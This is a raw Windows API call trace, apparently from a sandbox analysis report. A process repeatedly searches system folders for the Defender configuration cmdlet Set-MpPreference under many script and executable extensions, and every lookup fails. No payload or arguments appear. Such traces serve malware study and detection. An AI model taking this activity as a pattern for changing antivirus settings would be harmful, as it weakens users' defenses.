	[0057.884] GetLastError () returned 0x2
	[0057.884] SetErrorMode (uMode=0x1) returned 0x1
	[0057.884] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.884] GetLastError () returned 0x2
	[0057.884] SetErrorMode (uMode=0x1) returned 0x1
	[0057.884] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.884] GetLastError () returned 0x2
	[0057.884] SetErrorMode (uMode=0x1) returned 0x1
	[0057.884] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.ps1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.884] GetLastError () returned 0x2
	[0057.885] SetErrorMode (uMode=0x1) returned 0x1
	[0057.885] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.885] GetLastError () returned 0x2
	[0057.885] SetErrorMode (uMode=0x1) returned 0x1
	[0057.885] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psm1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.885] GetLastError () returned 0x2
	[0057.885] SetErrorMode (uMode=0x1) returned 0x1
	[0057.885] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.885] GetLastError () returned 0x2
	[0057.885] SetErrorMode (uMode=0x1) returned 0x1
	[0057.885] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psd1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.885] GetLastError () returned 0x2
	[0057.885] SetErrorMode (uMode=0x1) returned 0x1
	[0057.885] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.885] GetLastError () returned 0x2
	[0057.885] SetErrorMode (uMode=0x1) returned 0x1
	[0057.886] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.COM", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.886] GetLastError () returned 0x2
	[0057.886] SetErrorMode (uMode=0x1) returned 0x1
	[0057.886] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.886] GetLastError () returned 0x2
	[0057.886] SetErrorMode (uMode=0x1) returned 0x1
	[0057.886] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.EXE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.886] GetLastError () returned 0x2
	[0057.886] SetErrorMode (uMode=0x1) returned 0x1
	[0057.886] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.886] GetLastError () returned 0x2
	[0057.886] SetErrorMode (uMode=0x1) returned 0x1
	[0057.886] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.BAT", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.886] GetLastError () returned 0x2
	[0057.887] SetErrorMode (uMode=0x1) returned 0x1
	[0057.887] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.887] GetLastError () returned 0x2
	[0057.887] SetErrorMode (uMode=0x1) returned 0x1
	[0057.887] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.CMD", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.887] GetLastError () returned 0x2
	[0057.887] SetErrorMode (uMode=0x1) returned 0x1
	[0057.887] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.887] GetLastError () returned 0x2
	[0057.887] SetErrorMode (uMode=0x1) returned 0x1
	[0057.887] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBS", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.887] GetLastError () returned 0x2
	[0057.887] SetErrorMode (uMode=0x1) returned 0x1
	[0057.887] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.887] GetLastError () returned 0x2
	[0057.887] SetErrorMode (uMode=0x1) returned 0x1
	[0057.888] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.888] GetLastError () returned 0x2
	[0057.888] SetErrorMode (uMode=0x1) returned 0x1
	[0057.888] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.888] GetLastError () returned 0x2
	[0057.888] SetErrorMode (uMode=0x1) returned 0x1
	[0057.888] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JS", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.888] GetLastError () returned 0x2
	[0057.888] SetErrorMode (uMode=0x1) returned 0x1
	[0057.888] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.888] GetLastError () returned 0x2
	[0057.888] SetErrorMode (uMode=0x1) returned 0x1
	[0057.888] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JSE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.889] GetLastError () returned 0x2
	[0057.889] SetErrorMode (uMode=0x1) returned 0x1
	[0057.889] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.889] GetLastError () returned 0x2
	[0057.889] SetErrorMode (uMode=0x1) returned 0x1
	[0057.889] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSF", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.889] GetLastError () returned 0x2
	[0057.889] SetErrorMode (uMode=0x1) returned 0x1
	[0057.948] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.948] GetLastError () returned 0x2
	[0057.948] SetErrorMode (uMode=0x1) returned 0x1
	[0057.948] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSH", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.948] GetLastError () returned 0x2
	[0057.948] SetErrorMode (uMode=0x1) returned 0x1
	[0057.949] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.949] GetLastError () returned 0x2
	[0057.949] SetErrorMode (uMode=0x1) returned 0x1
	[0057.949] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.MSC", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.949] GetLastError () returned 0x2
	[0057.949] SetErrorMode (uMode=0x1) returned 0x1
	[0057.949] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0057.949] GetLastError () returned 0x2
	[0057.949] SetErrorMode (uMode=0x1) returned 0x1
	[0057.949] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.949] GetLastError () returned 0x2
	[0057.949] SetErrorMode (uMode=0x1) returned 0x1
	[0057.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.949] GetLastError () returned 0x2
	[0057.949] SetErrorMode (uMode=0x1) returned 0x1
	[0057.950] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.ps1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.950] GetLastError () returned 0x2
	[0057.950] SetErrorMode (uMode=0x1) returned 0x1
	[0057.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.950] GetLastError () returned 0x2
	[0057.950] SetErrorMode (uMode=0x1) returned 0x1
	[0057.950] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psm1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.950] GetLastError () returned 0x2
	[0057.950] SetErrorMode (uMode=0x1) returned 0x1
	[0057.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.950] GetLastError () returned 0x2
	[0057.950] SetErrorMode (uMode=0x1) returned 0x1
	[0057.950] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psd1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.950] GetLastError () returned 0x2
	[0057.951] SetErrorMode (uMode=0x1) returned 0x1
	[0057.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.951] GetLastError () returned 0x2
	[0057.951] SetErrorMode (uMode=0x1) returned 0x1
	[0057.951] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.COM", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.951] GetLastError () returned 0x2
	[0057.951] SetErrorMode (uMode=0x1) returned 0x1
	[0057.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.951] GetLastError () returned 0x2
	[0057.951] SetErrorMode (uMode=0x1) returned 0x1
	[0057.951] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.EXE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.951] GetLastError () returned 0x2
	[0057.951] SetErrorMode (uMode=0x1) returned 0x1
	[0057.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.951] GetLastError () returned 0x2
	[0057.951] SetErrorMode (uMode=0x1) returned 0x1
	[0057.951] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.BAT", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.952] GetLastError () returned 0x2
	[0057.952] SetErrorMode (uMode=0x1) returned 0x1
	[0057.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.952] GetLastError () returned 0x2
	[0057.952] SetErrorMode (uMode=0x1) returned 0x1
	[0057.952] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.CMD", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.952] GetLastError () returned 0x2
	[0057.952] SetErrorMode (uMode=0x1) returned 0x1
	[0057.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.952] GetLastError () returned 0x2
	[0057.952] SetErrorMode (uMode=0x1) returned 0x1
	[0057.952] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBS", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.952] GetLastError () returned 0x2
	[0057.952] SetErrorMode (uMode=0x1) returned 0x1
	[0057.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.953] GetLastError () returned 0x2
	[0057.953] SetErrorMode (uMode=0x1) returned 0x1
	[0057.953] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.953] GetLastError () returned 0x2
	[0057.953] SetErrorMode (uMode=0x1) returned 0x1
	[0057.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.953] GetLastError () returned 0x2
	[0057.953] SetErrorMode (uMode=0x1) returned 0x1
	[0057.953] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JS", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.953] GetLastError () returned 0x2
	[0057.953] SetErrorMode (uMode=0x1) returned 0x1
	[0057.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.953] GetLastError () returned 0x2
	[0057.953] SetErrorMode (uMode=0x1) returned 0x1
	[0057.953] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JSE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.954] GetLastError () returned 0x2
	[0057.954] SetErrorMode (uMode=0x1) returned 0x1
	[0057.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.954] GetLastError () returned 0x2
	[0057.954] SetErrorMode (uMode=0x1) returned 0x1
	[0057.954] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSF", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.954] GetLastError () returned 0x2
	[0057.954] SetErrorMode (uMode=0x1) returned 0x1
	[0057.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.954] GetLastError () returned 0x2
	[0057.954] SetErrorMode (uMode=0x1) returned 0x1
	[0057.954] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSH", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.954] GetLastError () returned 0x2
	[0057.955] SetErrorMode (uMode=0x1) returned 0x1
